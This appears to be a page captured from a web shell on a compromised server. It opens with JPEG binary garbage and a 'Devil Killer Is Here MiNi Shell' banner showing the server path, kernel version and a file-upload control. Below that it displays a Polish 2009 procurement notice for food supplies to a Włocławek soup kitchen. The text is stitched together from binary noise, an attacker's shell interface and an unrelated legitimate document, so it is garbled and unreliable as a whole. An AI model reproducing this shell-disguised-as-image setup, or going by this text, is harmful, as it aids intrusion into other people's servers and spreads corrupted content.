JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090313/62046-N-2009.html

<p class="kh_header"><b>Włocławek: Dostawy różnych artykułów spożywczych dla Gospodarstwa Pomocniczego przy MOPR we Włocławku (nr GP.3431-05/2009)</b><br>
<b>Numer ogłoszenia: 62046 - 2009; data zamieszczenia: 13.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gospodarstwo Pomocnicze przy Miejskim Ośrodku Pomocy Rodzinie we Włocławku , ul. Św. Antoniego 11, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4110380, faks 054 4110380.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jadlodajniawloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy różnych artykułów spożywczych dla Gospodarstwa Pomocniczego przy MOPR we Włocławku (nr GP.3431-05/2009).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są dostawy niżej wymienionych artykułów dla Gospodarstwa Pomocniczego przy MOPR: 

I część zamówienia (różne artykuły spożywcze):

a) Syrop, owocowy o smaku malinowym, wiśniowym, truskawkowym lub pomarańczowym, słodzony cukrem (bez substancji słodzących), o stopniu rozcieńczenia 1:10, w opakowaniu szklanym lub plastikowym od 0,4 litra do 1,0 litra, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary litr, ilość 100l,
b) Syrop, owocowy o smaku malinowym, wiśniowym, truskawkowym lub pomarańczowym, słodzony cukrem (bez substancji słodzących), o stopniu rozcieńczenia 1:10, w opakowaniu szklanym lub plastikowym od 1,5 litra do 5,0 litra, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary litr, ilość 270l,
c) Ryż, biały, w opakowaniu papierowym od 0,5 kg do 5 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 1000kg, 
d) Kasza manna, w opakowaniu papierowym od 0,4 kg do 5,0 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 80kg, 
e) Mąka pszenna typu 500, w opakowaniu papierowym do 25 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 2700kg, 
f) Mąka pszenna ekstra - tortowa, I klasa jakości, w opakowaniu papierowym do 5,0 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 100kg, 
g) Kasza gryczana, w opakowaniu papierowym, od 0,4 kg do 1,0 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 600kg, 
h) Olej roślinny, rafinowany, rzepakowy 100%, z pierwszego tłoczenia w opakowaniu plastikowym od 0,5 litra do 1,0 litra, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary litr, ilość 200l,
i) Olej roślinny, rafinowany, rzepakowy 100%, z pierwszego tłoczenia w opakowaniu plastikowym od 3,0 litra do 10 litrów, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary litr, ilość 700l,
j) Majonez, wysokotłuszczowy, o minimalnej zawartości tłuszczu 63%, w opakowaniu od 0,3 kg do 0,5 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 100kg, 
k) Majonez, wysokotłuszczowy, o minimalnej zawartości tłuszczu 63%, w opakowaniu od 0,6 kg do 5,0 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 100kg, 
l) Makaron świderki, niegotowany, w opakowaniu od 0,4 kg do 10 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 5000kg, 
m) Kawa zbożowa, typu Inka, sypana, rozpuszczalna, bezkofeinowa w opakowaniu od 100g do 150g, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 37kg, 
n) Zupa pieczarkowa, w proszku, o minimalnej zawartości suszonych pieczarek 6%, w opakowaniu od 35 g 
do 1,0 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 80kg, 
o) Makaron spaghetti, długi, zawierający pszenicę durum lub mąkę pszenną - semolinę, w opakowaniu od 0,4 kg do 5 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 480kg, 
p) Kasza jęczmienna, w opakowaniu papierowym od 0,5 do 5,0 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 900kg,
q) Przyprawa do potraw chińskich typu FIX, w opakowaniu do 1 kg, z minimalnym terminem przydatności do spożycia 3 miesiąc od daty zakupu, jednostka miary kilogram, ilość 54kg, 
r) Przyprawa w płynie, typu Magii, w opakowaniu do 1 litra, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary litr, ilość 750l, 
s) Kwasek cytrynowy, biały, kryształ, w opakowaniu do 1 kg, z minimalnym terminem przydatności do spożycia 3 miesiąc od daty zakupu, jednostka miary kilogram, ilość 35kg, 
t) Cukier waniliowy, biały, w opakowaniu do 1,0 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 2kg, 
u) Przyprawa do drobiu, w opakowaniu do 1,5kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 12kg,
v) Majeranek, suszony, rozkruszony, w opakowaniu do 1 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 20kg, 
w) Przyprawa typu Jarzynka, sypka, w opakowaniu do 5 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 600kg, 
x) Kostka rosołowa, przyprawa do potraw, o pojemności opakowania do 20 szt. kostek, w opakowaniu do 200 g z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 20kg, 
y) Żurek, w płynie, w butelkach plastikowych od 0,4 l do 1,0 l, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary litr, ilość 600l, 
z) Herbata liściasta, czarna, w opakowaniu od 80 g do 100 g, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 10kg, 
aa) Herbata mięta, w torebkach pakowanych po 20 szt., opakowanie minimum 30 g, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 40kg, 
bb) Cukier biały, sypki, z buraków cukrowych, kryształ, w opakowaniu papierowym od 0,5kg do 25kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 1000kg,
cc) Pieprz czarny, mielony, w opakowaniu do 1,0 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 40kg,
dd) Sól spożywcza, jodowana, warzona, w opakowaniu do 25 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 900kg, 
ee) Musztarda stołowa, w opakowaniu szklanym lub plastikowym do 1,0kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 40kg, 
ff) Ocet spożywczy, spirytusowy, w opakowaniu plastikowym lub szklanym 0,5l, z minimalnym  terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary litr, ilość 150l. 

II część zamówienia (puree ziemniaczane):

a) Puree ziemniaczane, w płatkach ziemniaczanych lub w proszku. Minimalny przyrost produktu w stosunku do masy puree 6-krotny, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość  3100kg .   

Jakość wymienionego asortymentu nie może odbiegać od jakości towaru dostępnego w ogólnej sieci handlowej.

2. Wykonawca zapewnia transport RÓŻNYCH ARTYKUŁÓW SPOŻYWCZYCH do siedziby zamawiającego na własny koszt, dlatego cena oferty musi zawierać koszty transportu.
3. Transport RÓŻNYCH ARTYKUŁÓW SPOŻYWCZYCH musi odbywać się w warunkach spełniających wymogi sanitarno - epidemiologiczne.
4. Miejscem dostaw jest Jadłodajnia przy ul. Św. Antoniego 11 we Włocławku.
5. Ilość ARTYKUŁÓW SPOŻYWCZYCH, o których mowa w pkt 1 może ulec zmianie ilościowo o minus 10%.
6. Zamawiający będzie zamawiał określoną partię towaru telefonicznie lub faksem z jednodniowym wyprzedzeniem, najpóźniej do godziny 13:00.
7. Dostawy będą odbywać się sukcesywnie przez okres obowiązywania umowy, ilościowo według zapotrzebowania zamawiającego, dwa razy w tygodniu każdorazowo do godz. 10:00.
8. Przedmiot zamówienia musi odpowiadać parametrom ilościowym i jakościowym określonym przez zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.00.00-5, 15.85.11.00-9, 15.86.00.00-4, 15.87.11.10-8, 15.87.12.50-1, 15.87.12.70-7, 15.87.12.73-8, 15.87.20.00-1, 15.87.24.00-5, 15.60.00.00-4, 15.61.21.00-2, 15.61.31.00-9, 15.40.00.00-2, 15.41.12.00-4, 15.31.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy,którzy: 
1.posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 
Ocenę spełniania warunków udziału w postępowaniu przeprowadzi komisja przetargowa po otwarciu ofert, zgodnie z formułą (spełnia-nie spełnia), w oparciu o informacje zawarte w dokumentach i oświadczeniach zamieszczonych w ofercie.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie Wykonawcy o spełnianiu warunków udziału w  postępowaniu, określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Wykonawcy występujący wspólnie składają takie oświadczenia, każdy osobno.
W przypadku składania oferty na obie części przedmiotu zamówienia Wykonawca winien złożyć ten dokument w jednym egzemplarzu.
2. Odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert, w celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania działalności objętej zamówieniem. Wykonawcy występujący wspólnie składają odpowiedni dokument, każdy osobno.
3. Wykaz wykonanych (minimum jednej), a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia (wg załączonego wzoru). 
(Przez odpowiednią wartość rozumie się dostawy o wartości co najmniej 50% ceny brutto oferty składanej w niniejszym postępowaniu).       
4. Dokumenty potwierdzające, że dostawy, zostały wykonane należycie (referencje).
5. Wykaz samochodów dostawczych (minimum jeden), jakimi dysponuje lub będzie dysponował wykonawca do realizacji zamówienia.
(Jeżeli wykonawca wskazał w wykazie wyłącznie samochody, którymi będzie dysponował, zobowiązany jest przedstawić pisemne zobowiązanie innych podmiotów do ich udostępnienia.)
6. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, do oferty musi być załączony dokument ustanawiający pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich kopii.
7. Jeśli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 2. składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w niniejszym punkcie, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
8. Dokumenty mogą być przedstawione w formie oryginału lub kopii poświadczonych na każdej ze stron za zgodność z oryginałem przez wykonawcę (przez wykonawcę należy rozumieć osobę uprawnioną do reprezentowania wykonawcy na zewnątrz, bądź pełnomocnika)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.jadlodajniawloclawek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gospodarstwo Pomocnicze przy MOPR
ul. Św. Antoniego 11
87-800 Włocławek
BIURO I piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2009 godzina 15:30, miejsce: Gospodarstwo Pomocnicze przy MOPR
ul. Św. Antoniego 11
87-800 Włocławek
BIURO I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca składający ofertę dostarczy dokumenty potwierdzające, że wskazane w ofercie samochody dostawcze spełniają normy sanitarno - epidemiologiczne (zezwolenie, decyzja Państwowej Inspekcji Sanitarnej, Państwowej Inspekcji Weterynaryjnej, itp. na dany samochód lub dokument równoważny wydawany przez podmiot uprawniony do kontroli sanitarno- epidemiologicznej w zakresie, w którym wykonawca składa ofertę.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Różne artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Syrop, owocowy o smaku malinowym, wiśniowym, truskawkowym lub pomarańczowym, słodzony cukrem (bez substancji słodzących), o stopniu rozcieńczenia 1:10, w opakowaniu szklanym lub plastikowym od 0,4 litra do 1,0 litra, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary litr, ilość 100l,
b) Syrop, owocowy o smaku malinowym, wiśniowym, truskawkowym lub pomarańczowym, słodzony cukrem (bez substancji słodzących), o stopniu rozcieńczenia 1:10, w opakowaniu szklanym lub plastikowym 
od 1,5 litra do 5,0 litra, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary litr, ilość 270l,
c) Ryż, biały, w opakowaniu papierowym od 0,5 kg do 5 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 1000kg, 
d) Kasza manna, w opakowaniu papierowym od 0,4 kg do 5,0 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 80kg, 
e) Mąka pszenna typu 500, w opakowaniu papierowym do 25 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 2700kg, 
f) Mąka pszenna ekstra - tortowa, I klasa jakości, w opakowaniu papierowym do 5,0 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 100kg, 
g) Kasza gryczana, w opakowaniu papierowym, od 0,4 kg do 1,0 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 600kg, 
h) Olej roślinny, rafinowany, rzepakowy 100%, z pierwszego tłoczenia w opakowaniu plastikowym od 0,5 litra do 1,0 litra, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary litr, ilość 200l,
i) Olej roślinny, rafinowany, rzepakowy 100%, z pierwszego tłoczenia w opakowaniu plastikowym od 3,0 litra do 10 litrów, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary litr, ilość 700l,
j) Majonez, wysokotłuszczowy, o minimalnej zawartości tłuszczu 63%, w opakowaniu od 0,3 kg do 0,5 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 100kg, 
k) Majonez, wysokotłuszczowy, o minimalnej zawartości tłuszczu 63%, w opakowaniu od 0,6 kg do 5,0 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 100kg, 
l)Makaron świderki, niegotowany, w opakowaniu od 0,4 kg do 10 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 5000kg, 
m) Kawa zbożowa, typu Inka, sypana, rozpuszczalna, bezkofeinowa w opakowaniu od 100g do 150g, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 37kg, 
n) Zupa pieczarkowa, w proszku, o minimalnej zawartości suszonych pieczarek 6%, w opakowaniu od 35 g do 1,0 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 80kg, 
o) Makaron spaghetti, długi, zawierający pszenicę durum lub mąkę pszenną - semolinę, w opakowaniu od 0,4 kg do 5 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 480kg, 
p) Kasza jęczmienna, w opakowaniu papierowym od 0,5 do 5,0 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 900kg,
q) Przyprawa do potraw chińskich typu FIX, w opakowaniu do 1 kg, z minimalnym terminem przydatności do spożycia 3 miesiąc od daty zakupu, jednostka miary kilogram, ilość 54kg, 
r) Przyprawa w płynie, typu Magii, w opakowaniu do 1 litra, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary litr, ilość 750l, 
s) Kwasek cytrynowy, biały, kryształ, w opakowaniu do 1 kg, z minimalnym terminem przydatności do spożycia 3 miesiąc od daty zakupu, jednostka miary kilogram, ilość 35kg, 
t) Cukier waniliowy, biały, w opakowaniu do 1,0 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 2kg, 
u) Przyprawa do drobiu, w opakowaniu do 1,5kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 12kg,
v) Majeranek, suszony, rozkruszony, w opakowaniu do 1 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 20kg, 
w) Przyprawa typu Jarzynka, sypka, w opakowaniu do 5 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 600kg, 
x) Kostka rosołowa, przyprawa do potraw, o pojemności opakowania do 20 szt. kostek, w opakowaniu do 200 g z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 20kg, 
y) Żurek, w płynie, w butelkach plastikowych od 0,4 l do 1,0 l, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary litr, ilość 600l, 
z) Herbata liściasta, czarna, w opakowaniu od 80 g do 100 g, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 10kg, 
aa) Herbata mięta, w torebkach pakowanych po 20 szt., opakowanie minimum 30 g, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 40kg, 
bb) Cukier biały, sypki, z buraków cukrowych, kryształ, w opakowaniu papierowym od 0,5kg do 25kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 1000kg,
cc) Pieprz czarny, mielony, w opakowaniu do 1,0 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 40kg,
dd) Sól spożywcza, jodowana, warzona, w opakowaniu do 25 kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 900kg, 
ee) Musztarda stołowa, w opakowaniu szklanym lub plastikowym do 1,0kg, z minimalnym terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary kilogram, ilość 40kg, 
ff) Ocet spożywczy, spirytusowy, w opakowaniu plastikowym lub szklanym 0,5l, z minimalnym  terminem przydatności do spożycia 3 miesiące od daty zakupu, jednostka miary litr, ilość 150l..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.00.00-5, 15.85.11.00-9, 15.86.00.00-4, 15.87.11.10-8, 15.87.12.50-1, 15.87.12.70-7, 15.87.12.73-8, 15.87.20.00-1, 15.87.24.00-5, 15.60.00.00-4, 15.61.21.00-2, 15.61.31.00-9, 15.40.00.00-2, 15.41.12.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Puree ziemniaczane.</p>
